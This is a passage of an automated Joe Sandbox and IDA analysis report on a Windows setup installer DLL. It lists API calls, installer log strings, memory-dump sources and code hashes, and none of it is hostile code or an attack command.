                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Creating Layout$Error$Installing$Repairing$Uninstalling$Uninstalling Patch
                                                              • API String ID: 431132790-1745000867
                                                              • Opcode ID: 19a7cfd0f67d154e2b69430231841caa2f342995dcfc80cc8ecb0eb88009a437
                                                              • Instruction ID: 79983d2572a08d65c6cdce938f6b286b33ed010c6fa9acab2fab80a6bbe2897f
                                                              • Opcode Fuzzy Hash: 19a7cfd0f67d154e2b69430231841caa2f342995dcfc80cc8ecb0eb88009a437
                                                              • Instruction Fuzzy Hash: 70F0C8356AD20EB6FF208A148E02FB86121E765B6EF204801E424ABFC1C7B4E505EA16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C965D92
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965DD0
                                                              • GetLastError.KERNEL32(?,Setup Installer,00000001,00000000,00000000,00000000,?,?,6C964247,00000000,?), ref: 6C965E72
                                                              Strings
                                                              • Auto detecting proxy information, xrefs: 6C965D9C
                                                              • WinHttpDetectAutoProxyConfigUrl, xrefs: 6C965DD9
                                                              • WinHttpGetProxyForUrl, xrefs: 6C965E7B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$H_prolog3
                                                              • String ID: Auto detecting proxy information$WinHttpDetectAutoProxyConfigUrl$WinHttpGetProxyForUrl
                                                              • API String ID: 3502553090-3439616282
                                                              • Opcode ID: 74401bb3cc222331866baf5b7c9238539ae3b2ed33b42e576d12d648af5136f9
                                                              • Instruction ID: 8aa86a23fb8fb86cfea362706a560098b22125514ef7642c277d901e06113275
                                                              • Opcode Fuzzy Hash: 74401bb3cc222331866baf5b7c9238539ae3b2ed33b42e576d12d648af5136f9
                                                              • Instruction Fuzzy Hash: 73418A75A10219EFDF04DFA5C895AEEBBB2FF58304F00452AE512ABA91C734D904CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C93BDF5
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C93BD95: __EH_prolog3.LIBCMT ref: 6C93BD9C
                                                                • Part of subcall function 6C93953C: __EH_prolog3.LIBCMT ref: 6C939543
                                                              • _free.LIBCMT ref: 6C93BE65
                                                                • Part of subcall function 6C96BE0E: HeapFree.KERNEL32(00000000,00000000,?,6C96D3BD,00000000,?,6C94831D,6C96BD2E,6C96C03C,00000000), ref: 6C96BE24
                                                                • Part of subcall function 6C96BE0E: GetLastError.KERNEL32(00000000,?,6C96D3BD,00000000,?,6C94831D,6C96BD2E,6C96C03C,00000000), ref: 6C96BE36
                                                              • #141.MSI(00000003,00000000,?,00000000,?,?,6C90AB18,?,6C90AB18,00000024,6C94C05B,?,?,?,?,?), ref: 6C93BE9D
                                                              • GetCommandLineW.KERNEL32(?,00000000,?,?,6C90AB18,?,6C90AB18,00000024,6C94C05B,?,?,?,?,?,?,?), ref: 6C93BEA5
                                                              • #141.MSI(00000102,00000000,?,00000000,?,?), ref: 6C93BED7
                                                              • #281.MSI(Function_0004BFA8,00000922,?,00000000,?,?), ref: 6C93BEE5
                                                              • #137.MSI(Function_0004BF8A,00007FDF,?,?,?), ref: 6C93BEF6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$#141$#137#281CommandErrorFreeHeapLastLine_free
                                                              • String ID:
                                                              • API String ID: 2896052883-0
                                                              • Opcode ID: eb31b34eb6a0190561f0d92c13c011c5611156247c7d930238e200c4ad305179
                                                              • Instruction ID: abaed40a079cdbb1fd78184d887506730723cf8180296f42ae33c7808f176539
                                                              • Opcode Fuzzy Hash: eb31b34eb6a0190561f0d92c13c011c5611156247c7d930238e200c4ad305179
                                                              • Instruction Fuzzy Hash: 513150B1501788AFDB20DFA9C845A8ABBF8BF28308F10451DE59A97B41C774E548CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 6C935E89
                                                              • GetLastError.KERNEL32 ref: 6C935E91
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6C935EB2
                                                              • ResetEvent.KERNEL32(00000000), ref: 6C935EB9
                                                              • CloseHandle.KERNEL32(00000000), ref: 6C935EE8
                                                              Strings
                                                              • Launching Install operation. Download operation is completed., xrefs: 6C935EC4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Event$CloseCreateErrorHandleLastObjectResetSingleWait
                                                              • String ID: Launching Install operation. Download operation is completed.
                                                              • API String ID: 1135383174-2441870237
                                                              • Opcode ID: bf4c36e51ab0e797d18caf2432c377442d344573639ecbaa6a9ca244568367e4
                                                              • Instruction ID: af6ade630a16d8637e878001a3ca4a7bc79fda02ea70afedf0896cae6318906a
                                                              • Opcode Fuzzy Hash: bf4c36e51ab0e797d18caf2432c377442d344573639ecbaa6a9ca244568367e4
                                                              • Instruction Fuzzy Hash: 7211AD75600209BFCB20DF64C849FAEBBB5EB8A758F208018EA25A72C0D770D541CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(kernel32.dll,?,6C96ADB1), ref: 6C96AD70
                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C96AD87
                                                              • GetProcAddress.KERNEL32(DecodePointer), ref: 6C96AD99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                              • API String ID: 2238633743-1525541703
                                                              • Opcode ID: 9b79bdc49eb8fef9efe4981bc11805bd22b19241f2b074b4ff856a06b15528a4
                                                              • Instruction ID: e31fc596306cab2995837a678bb1e1008680b4402dd771bc178b12e26d407c2d
                                                              • Opcode Fuzzy Hash: 9b79bdc49eb8fef9efe4981bc11805bd22b19241f2b074b4ff856a06b15528a4
                                                              • Instruction Fuzzy Hash: A8E0EC70B0C2649ECF549BF1F808A4A3FF9AB8A298B24451BE42492900DB348045DF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 6C94BD62
                                                              • GetTickCount.KERNEL32 ref: 6C94BD72
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C94BDF3
                                                              • TranslateMessage.USER32(?), ref: 6C94BE01
                                                              • DispatchMessageW.USER32(?), ref: 6C94BE0B
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C94BE1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Message$Peek$CountDispatchMultipleObjectsTickTranslateWait
                                                              • String ID:
                                                              • API String ID: 732506675-0
                                                              • Opcode ID: 1663626f52b1a12052a8c668211d7a891d9dfe5cdf519a2e4c3783206c9a48fe
                                                              • Instruction ID: d8c0a51f5056d4294e769029ac677dcbcf570edc48fdeb6e83011b1b81c8aed1
                                                              • Opcode Fuzzy Hash: 1663626f52b1a12052a8c668211d7a891d9dfe5cdf519a2e4c3783206c9a48fe
                                                              • Instruction Fuzzy Hash: 1F31D8F2A00708ABDB119FB1C884DDF7BFDEF45755B244969E152A2550EB31D884CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • schema validation failure: child element not found - , xrefs: 6C919020
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: String$AllocException@8FreeH_prolog3Throw
                                                              • String ID: schema validation failure: child element not found -
                                                              • API String ID: 3394977177-3859288074
                                                              • Opcode ID: aa66a92b21966c96c40f26254ceb5f0afc136efb9d46170e2dba6ae614f99f60
                                                              • Instruction ID: 9e662961933a28e5749684c875b8b050552714f9512c0ec821da6437aadb1e9d
                                                              • Opcode Fuzzy Hash: aa66a92b21966c96c40f26254ceb5f0afc136efb9d46170e2dba6ae614f99f60
                                                              • Instruction Fuzzy Hash: FF417FB1900249EFCB04DFA8C9849DEBBB9BF19318F244569F511E7B40CB30DA15DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C953E9E
                                                                • Part of subcall function 6C95401F: __EH_prolog3.LIBCMT ref: 6C954026
                                                                • Part of subcall function 6C95401F: GetThreadLocale.KERNEL32(?,DHTMLHeader.html), ref: 6C954041
                                                                • Part of subcall function 6C95401F: GetModuleFileNameW.KERNEL32(6C8F0000,00000010,00000104), ref: 6C9540B3
                                                                • Part of subcall function 6C95401F: PathFileExistsW.SHLWAPI(?,00000014,00000000), ref: 6C954101
                                                              • __CxxThrowException@8.LIBCMT ref: 6C953F43
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • GetFileSize.KERNEL32(?,00000000,00000080,80000000,00000001,00000003,00000080,00000000,?), ref: 6C953F4C
                                                              • CloseHandle.KERNEL32(?), ref: 6C953F6A
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$File$CloseDispatcherExceptionException@8ExistsHandleLocaleModuleNamePathSizeThreadThrowUser
                                                              • String ID: DHTML Header: %s
                                                              • API String ID: 3827389996-3243986505
                                                              • Opcode ID: 5a01ccdba57c30fc50e0996e66201f3a2976249253c9c5a469f88e6167f3eb58
                                                              • Instruction ID: 689ecf6bf218e5bf2690370b73b335cd4878a1b47760bee4a7366e3ed167fb3b
                                                              • Opcode Fuzzy Hash: 5a01ccdba57c30fc50e0996e66201f3a2976249253c9c5a469f88e6167f3eb58
                                                              • Instruction Fuzzy Hash: 4C414971900209EFDF14DFA8D845ADEBBB9BF29318F14055AE110B7A80CB34DA598BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C956D68
                                                              • __CxxThrowException@8.LIBCMT ref: 6C956E31
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • ReadFile.KERNEL32(00000003,00000000,?,?,00000000,?,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?), ref: 6C956E4D
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 6C956E6C
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                                • Part of subcall function 6C91A3BC: __EH_prolog3.LIBCMT ref: 6C91A3C3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CloseDispatcherExceptionException@8FileHandleReadThrowUser
                                                              • String ID: File: %s
                                                              • API String ID: 3209669068-1010730093
                                                              • Opcode ID: b824e3ea3571e5e088b5cd66f73752fb02daf56741c972da120e10b50f815aa6
                                                              • Instruction ID: b40f013a071ac8e15b59235473365e1ed2777e910eb118a843c501f10b0398fc
                                                              • Opcode Fuzzy Hash: b824e3ea3571e5e088b5cd66f73752fb02daf56741c972da120e10b50f815aa6
                                                              • Instruction Fuzzy Hash: 46316971900249EFDB10DFA8C845ADEBBB8BF25308F14845AE910B7B80C771DE19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • Item(s) availability state is "Error". Exiting setup., xrefs: 6C935DD7
                                                              • Launching Download operation. Install operation will follow after download is complete., xrefs: 6C935E3B
                                                              • Launching Download and Install operations simultaneously., xrefs: 6C935E4F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountTick
                                                              • String ID: Item(s) availability state is "Error". Exiting setup.$Launching Download and Install operations simultaneously.$Launching Download operation. Install operation will follow after download is complete.
                                                              • API String ID: 536389180-143185584
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,74DF23A0), ref: 6C935F12
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,74DF23A0), ref: 6C935F1C
                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000001,000000FF,?,74DF23A0), ref: 6C935F5B
                                                              • CloseHandle.KERNEL32(?,?,74DF23A0), ref: 6C935F6A
                                                              • CloseHandle.KERNEL32(?,?,74DF23A0), ref: 6C935F6F
                                                              Similarity
                                                              • API ID: CloseCreateEventHandle$MultipleObjectsWait
                                                              • String ID:
                                                              • API String ID: 3314610268-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __getptd.LIBCMT ref: 6C971EE7
                                                                • Part of subcall function 6C96D3D1: __getptd_noexit.LIBCMT ref: 6C96D3D4
                                                                • Part of subcall function 6C96D3D1: __amsg_exit.LIBCMT ref: 6C96D3E1
                                                              • __getptd.LIBCMT ref: 6C971EFE
                                                              • __amsg_exit.LIBCMT ref: 6C971F0C
                                                              • __lock.LIBCMT ref: 6C971F1C
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 6C971F30
                                                              Similarity
                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                              • String ID:
                                                              • API String ID: 938513278-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C944C43
                                                              • _memset.LIBCMT ref: 6C944C57
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 6C944C97
                                                                • Part of subcall function 6C968C9E: _memcpy_s.LIBCMT ref: 6C968CE4
                                                              Strings
                                                              Similarity
                                                              • API ID: CurrentH_prolog3_Process_memcpy_s_memset
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 3477395303-3733053543
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __CxxThrowException@8.LIBCMT ref: 6C95600F
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              • __EH_prolog3.LIBCMT ref: 6C955F12
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C93DBB0: __EH_prolog3.LIBCMT ref: 6C93DBB7
                                                              Strings
                                                              • In IronManExeInstaller::IronManExeInstaller, xrefs: 6C955FB3
                                                              • In CartmanExeInstaller::CartmanExeInstaller, xrefs: 6C955F6B
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser_malloc
                                                              • String ID: In CartmanExeInstaller::CartmanExeInstaller$In IronManExeInstaller::IronManExeInstaller
                                                              • API String ID: 3653670741-4107417756
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?), ref: 6C937DEB
                                                              • ReadFile.KERNEL32(6C938045,00000000,00100000,?,00000000,?), ref: 6C937E4E
                                                              • CloseHandle.KERNEL32(6C938045,?), ref: 6C937E9F
                                                              Strings
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleRead
                                                              • String ID:
                                                              • API String ID: 1035965006-3916222277
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C958E84
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • SysAllocString.OLEAUT32(?), ref: 6C958F31
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog3$AllocString
                                                              • String ID: </MsiPatch>$<MsiPatch
                                                              • API String ID: 99483316-2338456224
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C916CCB
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C915A22: __EH_prolog3.LIBCMT ref: 6C915A29
                                                                • Part of subcall function 6C915A22: #8.MSI(?,?,?,?,` WHERE ,?,00000000,?,` FROM `,?,SELECT `,00000014,6C916D4B,?,?,?), ref: 6C915AF2
                                                              Strings
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: MsiPatchMetadata$Value$`Property` = 'DisplayName'
                                                              • API String ID: 431132790-332461799
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: CountTick__aulldiv
                                                              • String ID: (ActionData)$Setting Progress: ticks, soFar = %d, %d %s
                                                              • API String ID: 3746106513-4185375322
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C931D78
                                                              • schema validation failure: Install action is not supported in the ActionTable for RelatedProducts., xrefs: 6C931D66
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw
                                                              • String ID: ParameterInfo.xml$schema validation failure: Install action is not supported in the ActionTable for RelatedProducts.
                                                              • API String ID: 3670251406-470515384
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C962F81
                                                              • CoInitialize.OLE32(00000000), ref: 6C962FAC
                                                                • Part of subcall function 6C941D31: __EH_prolog3.LIBCMT ref: 6C941D38
                                                              • GetCurrentThreadId.KERNEL32 ref: 6C962FFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CurrentInitializeThread
                                                              • String ID: PBH
                                                              • API String ID: 1175431296-622276336
                                                              • Opcode ID: 4b3d27afe88a25a314690c431c2e5c7537d8b461ed85ec24831a12f033ea5962
                                                              • Instruction ID: 45f1bf162ba97dedb65e9321781b50b484bb356471bf4ad044c89120a8658d0a
                                                              • Opcode Fuzzy Hash: 4b3d27afe88a25a314690c431c2e5c7537d8b461ed85ec24831a12f033ea5962
                                                              • Instruction Fuzzy Hash: 580125B4501B05CFDB62CF69C48868AFBE8BF65308F10480EE4AA87750C774E619CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C942C11
                                                              • GetSidLengthRequired.ADVAPI32(0C75FF50,00000050,6C942F2A,6C900B54,00000002,00000020,00000222,00000000,?,?,6C9448E0), ref: 6C942C75
                                                              • InitializeSid.ADVAPI32(0000000F,00000009,0C75FF50,?,?,6C9448E0), ref: 6C942C88
                                                              • GetSidSubAuthority.ADVAPI32(0000000F,00000000,?,?,6C9448E0), ref: 6C942CAF
                                                                • Part of subcall function 6C9684F6: GetLastError.KERNEL32(6C942C97,?,?,6C9448E0), ref: 6C9684F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AuthorityErrorH_prolog3_InitializeLastLengthRequired
                                                              • String ID:
                                                              • API String ID: 1730150861-0
                                                              • Opcode ID: 3dee1f5274ea5358b4f6c559a592dd011bd72a7638a21d07d40103883ee05c89
                                                              • Instruction ID: 649320cc7fd4fa6fb38dc4de662dd5d565e9870beed2dba0730b4d79728ee632
                                                              • Opcode Fuzzy Hash: 3dee1f5274ea5358b4f6c559a592dd011bd72a7638a21d07d40103883ee05c89
                                                              • Instruction Fuzzy Hash: BA21AEB0A00289DBDB04DFE1C4847DCBBB8BF25309F108029D605ABB40C735E91CCBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C963FB2
                                                              • CoInitialize.OLE32(00000000), ref: 6C963FD4
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C963FF0
                                                              • InitializeCriticalSection.KERNEL32(?), ref: 6C96405A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
